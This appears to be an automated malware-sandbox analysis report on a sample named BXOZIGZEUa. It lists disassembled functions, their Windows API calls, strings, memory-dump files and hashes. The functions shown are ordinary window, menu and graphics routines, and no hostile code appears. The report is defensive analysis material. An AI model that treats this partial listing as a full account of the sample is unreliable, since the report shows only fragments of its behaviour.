Part of subcall function 001E83AB: InvalidateRect.USER32(?,?,00000001,?), ref: 001E8420
Part of subcall function 001E83AB: InflateRect.USER32(?,?,?), ref: 001E8466
Part of subcall function 001E83AB: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 001E8479

UpdateWindow.USER32(?), ref: 001EB257
UpdateWindow.USER32(?), ref: 001EB2B6
SetCapture.USER32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 001EB2C1

Strings

83/, xrefs: 001EB169

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Parent$RectRedraw$Update$Cursor$CaptureInflateInvalidate$AsyncClientH_prolog3_ScreenState
String ID: 83/
API String ID: 991125134-2323854675
Opcode ID: 9b1e0cfad39aabf73fae8bdb9d797f78b1029ea6bf3d48a5057aeca9a3fab5e4
Instruction ID: 05b188cbc60fb5ab11745c588cab189f9df2dbec5ff523402906629f49e8dcd0
Opcode Fuzzy Hash: 9b1e0cfad39aabf73fae8bdb9d797f78b1029ea6bf3d48a5057aeca9a3fab5e4
Instruction Fuzzy Hash: C3026A74600A549FCF15AF65DCD8AAE7BB9FF08760F144279F80A9B2A6CB709940CF50

Function 0020F0F4 Relevance: 40.8, APIs: 27, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23

GetClientRect.USER32(?,00000000), ref: 0020F166
CopyRect.USER32(?,?), ref: 0020F198

Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D012C
Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D0139

IntersectRect.USER32(?,?,?), ref: 0020F1E7
SetRectEmpty.USER32(?), ref: 0020F1F5
IntersectRect.USER32(?,?,?), ref: 0020F227
SetRectEmpty.USER32(?), ref: 0020F235
IsRectEmpty.USER32(?), ref: 0020F245
IsRectEmpty.USER32(?), ref: 0020F24F
GetWindowRect.USER32(?,?), ref: 0020F27A
GetWindowRect.USER32(?,?), ref: 0020F29D
UnionRect.USER32(?,?,?), ref: 0020F2BA
EqualRect.USER32(?,?), ref: 0020F2C8
GetWindowRect.USER32(?,?), ref: 0020F353
IsRectEmpty.USER32(?), ref: 0020F3BD
MapWindowPoints.USER32(?,?,?,00000002), ref: 0020F3DA
RedrawWindow.USER32(?,?,00000000,00000185), ref: 0020F3EE
IsRectEmpty.USER32(?), ref: 0020F408
EqualRect.USER32(?,?), ref: 0020F416
MapWindowPoints.USER32(?,?,?,00000002), ref: 0020F433
RedrawWindow.USER32(?,?,00000000,00000185), ref: 0020F447
UpdateWindow.USER32(?), ref: 0020F45C
IsRectEmpty.USER32(?), ref: 0020F4A0
InvalidateRect.USER32(?,?,00000001), ref: 0020F4B5
IsRectEmpty.USER32(?), ref: 0020F4BB
EqualRect.USER32(?,?), ref: 0020F4CD
InvalidateRect.USER32(?,?,00000001), ref: 0020F4E0
UpdateWindow.USER32(?), ref: 0020F4E5

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$Empty$ClientEqual$IntersectInvalidatePointsRedrawScreenUpdate$CopyLongUnion
String ID:
API String ID: 4119827998-0
Opcode ID: 62340dffc81ce6f3e85edc59ba89f3b4efb3276f6b9b44838ddf0f968821a062
Instruction ID: 0fcf3c4f39f571367598026f6f7d0171eb1eddbb08bee3527d59d2de8cc455e0
Opcode Fuzzy Hash: 62340dffc81ce6f3e85edc59ba89f3b4efb3276f6b9b44838ddf0f968821a062
Instruction Fuzzy Hash: 57D1EB7291021EDFCF21DFA4DA84AEEB7B9BF08300F11416AE909EB155DB71AA45CF50

Function 0023872F Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 278windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(?,?,00000000,00000000,00000000,00002000), ref: 00238818
GetObjectW.GDI32(?,00000018,?), ref: 00238849
DeleteObject.GDI32(?), ref: 00238856
CreateCompatibleDC.GDI32(00000000), ref: 0023889A
GetObjectW.GDI32(?,00000018,?), ref: 002388B2
SelectObject.GDI32(?,?), ref: 002388D8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 002388F6
SelectObject.GDI32(?,?), ref: 00238909
CreateCompatibleDC.GDI32(?), ref: 0023891F
SelectObject.GDI32(?,?), ref: 00238934
SelectObject.GDI32(?,?), ref: 00238943
DeleteObject.GDI32(?), ref: 00238948
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00238968
GetPixel.GDI32(?,?,?), ref: 00238987
SetPixel.GDI32(?,?,?,00000000), ref: 002389BD
SelectObject.GDI32(?,?), ref: 002389DF
SelectObject.GDI32(?,?), ref: 002389E7
DeleteObject.GDI32(?), ref: 002389EC
DeleteObject.GDI32(?), ref: 00238A6E
__EH_prolog3.LIBCMT ref: 00238736

Part of subcall function 001D0E38: DeleteObject.GDI32 ref: 001D0E51

Strings

, xrefs: 0023885E
TR/uj", xrefs: 002387CB

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Select$Delete$CompatibleCreate$Pixel$BitmapH_prolog3ImageLoad
String ID: $TR/uj"
API String ID: 2657855633-2457051616
Opcode ID: 04e70dd001d1e2888da2fda181aa12b6910a161ddb101d40a2a0a8efaf45b379
Instruction ID: 7bff1e8e8cabfb02c040b225c97631bb4617b4cb869ba0fd8c51f4d762f7684b
Opcode Fuzzy Hash: 04e70dd001d1e2888da2fda181aa12b6910a161ddb101d40a2a0a8efaf45b379
Instruction Fuzzy Hash: F4B13CB191021AEFCF11EFA0CD85AEDBBB5FF18300F50812AF515AA261DB309A65DF51

Function 00237DA3 Relevance: 37.8, APIs: 25, Instructions: 260COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00237DAD
CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 00237DF0
GetObjectW.GDI32(?,00000018,?), ref: 00237E2A
DeleteObject.GDI32(?), ref: 00237EA7
CreateCompatibleDC.GDI32(00000000), ref: 00237EE1
GetObjectW.GDI32(?,00000018,?), ref: 00237EFD

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$CompatibleCopyCreateDeleteH_prolog3_Image
String ID:
API String ID: 641560573-0
Opcode ID: 6cf23e6f579cffdf76b9680a4f99887337a628dfb5c67bb836a30246ca859aa9
Instruction ID: be3f0f824835066bbc554cc070e75f7f84db03298e180aeae26c6ba44ced19f7
Opcode Fuzzy Hash: 6cf23e6f579cffdf76b9680a4f99887337a628dfb5c67bb836a30246ca859aa9
Instruction Fuzzy Hash: 37C1BFB1810269EFCF229F60CC84AEDBBB5BF18300F1041E9E58DA6261DB705EA5DF50

Function 002027AA Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 446windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002027B4
IsWindow.USER32(?), ref: 00202856
GetMenuItemCount.USER32(00000001), ref: 002029B4
AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 002029CA
AppendMenuW.USER32(00000001,00000000,00000000,00000000), ref: 002029E5
SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 00202A5B
SendMessageW.USER32(?,0000041C,00000000,?), ref: 00202A98
GetMenuItemCount.USER32(00000001), ref: 00202AEE
AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 00202B04
AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 00202B25
GetMenuItemCount.USER32(00000001), ref: 00202B8C
AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 00202BA2
AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 00202BC3
AppendMenuW.USER32(00000002,00000000,00000000,?), ref: 00202CAB
GetWindow.USER32(?,00000005), ref: 00202CDC
AppendMenuW.USER32(00000003,00000000,00000000,?), ref: 00202D62
GetMenuItemCount.USER32(00000000), ref: 00202DA7
AppendMenuW.USER32(00000000,00000800,00000000,00000000), ref: 00202DBD
AppendMenuW.USER32(00000000,00000000,00000000,?), ref: 00202DD2

Strings

To/, xrefs: 00202A1F, 00202A34

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Append$CountItem$MessageSendWindow$H_prolog3_
String ID: To/
API String ID: 2495817426-3711964495
Opcode ID: 9a0d88cb1de993d374dce110ce010c22d659c6c29d7878cbdcbab9f212ea8e2f
Instruction ID: cb2a00e042c6bc1e9ad18d1236dd86806997d84782cbd57651ea7559f78aeba7
Opcode Fuzzy Hash: 9a0d88cb1de993d374dce110ce010c22d659c6c29d7878cbdcbab9f212ea8e2f
Instruction Fuzzy Hash: 63022A30A1421ADBDF249F64CC99BADB7B5BF14304F2440AEE50AAB292CF709D58DF50

Function 00235E03 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00235E0D
GetObjectW.GDI32(?,00000018,?), ref: 00235E4F
CreateCompatibleDC.GDI32(00000000), ref: 00235E8B
SelectObject.GDI32(?,?), ref: 00235EAE
_memset.LIBCMT ref: 00235EDE
GetObjectW.GDI32(?,00000054,?), ref: 00235EFF
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00235F61
CreateCompatibleDC.GDI32(?), ref: 00235FA6
SelectObject.GDI32(?,?), ref: 00235FC4

Strings

(, xrefs: 00235F5A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Create$CompatibleSelect$H_prolog3_Section_memset
String ID: (
API String ID: 1904682052-3887548279
Opcode ID: 5aad308f3f1e118a85cf6321385858853e25a9262bf29fa0e880bffe4e2ecae3
Instruction ID: 9b4a8a8baa67ffd7d52f6a1b9dfb772b5f22c37eb021809eb8f08c1af58a6c6c
Opcode Fuzzy Hash: 5aad308f3f1e118a85cf6321385858853e25a9262bf29fa0e880bffe4e2ecae3
Instruction Fuzzy Hash: 59B13C70910714EFDB61DF24DC89F9ABBB5FF49300F1481A9E88DA6252DB309A94DF21

Function 001D8819 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

GetParent.USER32(?), ref: 001D8853
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 001D8874
GetWindowRect.USER32(?,?), ref: 001D8893
GetWindowLongW.USER32(00000000,000000F0), ref: 001D88C5
MonitorFromWindow.USER32(00000000,00000001), ref: 001D88F9
GetMonitorInfoW.USER32(00000000), ref: 001D8900
CopyRect.USER32(?,?), ref: 001D8914
CopyRect.USER32(?,?), ref: 001D891E
GetWindowRect.USER32(00000000,?), ref: 001D8927
MonitorFromWindow.USER32(00000000,00000002), ref: 001D8934
GetMonitorInfoW.USER32(00000000), ref: 001D893B
CopyRect.USER32(?,?), ref: 001D8949

Strings

(, xrefs: 001D88DB

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
String ID: (
API String ID: 783970248-3887548279
Opcode ID: 6cf0730ae1887735fbda3dd9911159baab27ddb3bb8343e4092e1705cd7e9283
Instruction ID: d5a6cec975bf6fe7bcb25eadfe165a00718498005383c47a3dff17802e427b16
Opcode Fuzzy Hash: 6cf0730ae1887735fbda3dd9911159baab27ddb3bb8343e4092e1705cd7e9283
Instruction Fuzzy Hash: DA610AB2D00229ABCB15DFA8DD889EEBBB9FF48710F554516F945F7250DB70A900CBA0

Function 00233BC6 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 263windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00233BD0
CreateCompatibleDC.GDI32(00000000), ref: 00233C05
GetObjectW.GDI32(?,00000018,?), ref: 00233C26
SelectObject.GDI32(?,?), ref: 00233C78
CreateCompatibleDC.GDI32(?), ref: 00233CA5
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00233D0D
SelectObject.GDI32(?,?), ref: 00233D29
SelectObject.GDI32(?,00000000), ref: 00233D46
SelectObject.GDI32(?,?), ref: 00233D5E
DeleteObject.GDI32(?), ref: 00233D66
BitBlt.GDI32(?,00000000,00000000,?,000000FF,?,00000000,00000000,00CC0020), ref: 00233D8F
GetObjectW.GDI32(?,00000054,?), ref: 00233DC5
SelectObject.GDI32(?,?), ref: 00233FBA
SelectObject.GDI32(?,?), ref: 00233FC8
DeleteObject.GDI32(?), ref: 00233FD0

Strings

(, xrefs: 00233CEA
, xrefs: 00233DD3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Select$Create$CompatibleDelete$H_prolog3_Section
String ID: $(
API String ID: 339215182-55695022
Opcode ID: 8585aa2597c2f2bf9f4cb00f75ec0e6b1237ca791e0d82559e926c0b89fc91d9
Instruction ID: 42d0db83119189e4e2c487d2de2b5862236b967eba069ad93edad043d99554e5
Opcode Fuzzy Hash: 8585aa2597c2f2bf9f4cb00f75ec0e6b1237ca791e0d82559e926c0b89fc91d9
Instruction Fuzzy Hash: 73C14670910268DFDB25DF64CD85BADBBB5BF59300F0084EAE58DA6292CB704B94CF61

Function 0021F798 Relevance: 28.6, APIs: 19, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0021F7AE
GetSystemMenu.USER32(?,00000000,?,00000000,?,?,?,0021FE6E,?), ref: 0021F7CD
SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F7F6
GetParent.USER32(?), ref: 0021F7FF
IsZoomed.USER32(?), ref: 0021F80A
EnableMenuItem.USER32(?,0000F000,00000003), ref: 0021F824
EnableMenuItem.USER32(?,0000F010,00000003), ref: 0021F830
EnableMenuItem.USER32(?,0000F030,00000003), ref: 0021F83C

Part of subcall function 001DAB9B: GetParent.USER32(?), ref: 001DABA5

EnableMenuItem.USER32(?,0000F120,00000003), ref: 0021F84F
EnableMenuItem.USER32(?,0000F000,00000000), ref: 0021F85B
EnableMenuItem.USER32(?,0000F010,00000000), ref: 0021F867
EnableMenuItem.USER32(?,0000F030,00000000), ref: 0021F873
GetParent.USER32(?), ref: 0021F87B
DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F8A1
DeleteMenu.USER32(?,0000F030,00000000,?,?,?,0021FE6E,?), ref: 0021F8AD
GetParent.USER32(?), ref: 0021F8B5
DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F8D5
GetParent.USER32(?), ref: 0021F8E7
TrackPopupMenu.USER32(?,00000004,0021FE6E,6AFFFFFF,00000000,?,00000000), ref: 0021F932

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$Enable$Parent$Delete$DefaultPopupSystemTrackZoomed
String ID:
API String ID: 4239930045-0
Opcode ID: 7a3df65ce95d847e418247526e423e571570a05f94ce250c261798ce91f98446
Instruction ID: 986aad5c5dbdcb65f116cc93adad1051a8e66e6842bc179e41f7eafe326b97dd
Opcode Fuzzy Hash: 7a3df65ce95d847e418247526e423e571570a05f94ce250c261798ce91f98446
Instruction Fuzzy Hash: 7B41A231240305BFEB31BBA1DE46F6A7BA9EF94B00F114435F259AB5A1CB71EC50AB14

Function 00216688 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 0021669F
LoadCursorW.USER32(00000000,00007F00), ref: 0021670D
SetCursor.USER32(00000000), ref: 00216714
SetRectEmpty.USER32(?), ref: 0021672D

Strings

83/, xrefs: 002166AC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Cursor$CaptureEmptyLoadRect
String ID: 83/
API String ID: 2438408-2323854675
Opcode ID: eacc491e1540329cb7107c63bace0134ee830baec0dc15e80fa4f6b3613b8e2d
Instruction ID: 09aa58a4425a70fbc3e265392bece4154703d135f6626a6648632baa8b1b57bf
Opcode Fuzzy Hash: eacc491e1540329cb7107c63bace0134ee830baec0dc15e80fa4f6b3613b8e2d
Instruction Fuzzy Hash: 7CA12771E102199FCF01EFA8D9889EEBBFAFF58300F15402AE845EB214DB71A955CB50

Function 002338E6 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 237windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002338F0
CreateCompatibleDC.GDI32(00000000), ref: 00233957
GetObjectW.GDI32(002F51CC,00000018,000000FF), ref: 00233975
SelectObject.GDI32(?,002F51CC), ref: 002339B3
CreateCompatibleDC.GDI32(?), ref: 002339D1
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00233A27
SelectObject.GDI32(?,?), ref: 00233A3C
SelectObject.GDI32(?,00000000), ref: 00233A52
SelectObject.GDI32(?,?), ref: 00233A61
DeleteObject.GDI32(?), ref: 00233A68
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00233ABA
GetPixel.GDI32(?,?,00000000), ref: 00233B82
SetPixel.GDI32(?,?,00000000,?), ref: 00233B97
SelectObject.GDI32(?,?), ref: 00233BB4
SelectObject.GDI32(?,?), ref: 00233BBC

Strings

(, xrefs: 00233A07

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Select$Create$CompatiblePixel$DeleteH_prolog3_Section
String ID: (
API String ID: 1942225872-3887548279
Opcode ID: c25689e5944af62b18a47c29f35acd05262fcedc5873233a5da8dc60f64d7a30
Instruction ID: a9f7035cb87ca55fa0c8f163f1d767a0859095ec7ae9f1cdeeb9b1ffcbc394c7
Opcode Fuzzy Hash: c25689e5944af62b18a47c29f35acd05262fcedc5873233a5da8dc60f64d7a30
Instruction Fuzzy Hash: 91A100B1C10219EFCF21EFA4D984AADFBB5FF18314F20412AE45AA7261DB705A56DF10

Function 001CD54D Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504

GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 001CD577
GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 001CD58A
GetProcAddress.KERNEL32(00000000,BeginBufferedPaint), ref: 001CD59D
GetProcAddress.KERNEL32(00000000,EndBufferedPaint), ref: 001CD5B0
GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 001CD5FA
GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 001CD60D
GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 001CD620

Strings

EndBufferedPaint, xrefs: 001CD59F
UxTheme.dll, xrefs: 001CD552
DwmExtendFrameIntoClientArea, xrefs: 001CD5F4
dwmapi.dll, xrefs: 001CD5DA
DrawThemeTextEx, xrefs: 001CD579
BeginBufferedPaint, xrefs: 001CD58C
DrawThemeParentBackground, xrefs: 001CD571
DwmDefWindowProc, xrefs: 001CD5FC
DwmIsCompositionEnabled, xrefs: 001CD60F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
